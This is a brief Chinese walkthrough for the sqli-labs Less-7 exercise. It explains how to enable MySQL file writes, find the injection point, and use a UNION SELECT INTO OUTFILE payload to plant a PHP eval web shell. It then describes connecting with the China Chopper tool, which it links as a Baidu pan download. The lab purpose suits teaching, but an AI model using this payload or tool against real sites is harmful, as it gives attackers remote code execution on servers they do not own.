Less-7
使用中国菜刀连接,拿到shell。
1.开启写入权限
使用show variables like '%secure%'在MySQL命令行中判断
show variables like '%secure%';
如果这里为Null就没有写入权限
2.如何修改本地写入权限
通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。
secure_file_priv="/"
再次查看此参数,若参数值不为 null 则修改成功。
3.判断注入
使用单引号报错,但使用- - +注释符未回显正常,继续探测…
当使用单引号+双括号探测时,使用- -+回显正常,成功找到注入点。
使用into outfile写入函数
?id=1')) union select 1,2,'<?php @eval($_POST["caidao"]);?>' into outfile "写入自己的路径"--+
WebShell
使用中国菜刀连接
连接成功
还可以使用终端打开,可见一句话被写入的危害。
中国菜刀安装包(此包从GitHub下载无后门):
https://pan.baidu.com/s/1MCY4TDR_xJwZPFKKvse4Ig
提取码:nw6x
